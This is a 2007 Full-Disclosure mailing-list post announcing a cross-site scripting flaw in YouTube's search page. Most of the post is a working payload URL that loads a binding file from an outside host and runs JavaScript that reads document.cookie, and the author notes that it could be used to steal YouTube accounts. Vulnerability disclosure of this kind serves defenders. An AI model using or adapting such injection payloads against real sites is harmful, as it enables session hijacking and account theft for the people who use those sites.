[Full-disclosure] XSS in YouTube.com
Michal Majchrowicz
m.majchrowicz at gmail.com
Fri Dec 14 14:42:01 GMT 2007
I discovered it just while waiting for my video to download :)
http://youtube.com/results?search_query=test+'test%22%%20style=-moz-binding:url('http://sectroyer.110mb.com/xss.xml%23xss')%20style=background:url(javascript:alert(document.cookie))%20test=test
Besides stealing YouTube accounts I don't think it can be used for
something serious.
Just post it here in case anyone is interested.
Regards Michal.
Full-Disclosure is hosted and sponsored by Secunia.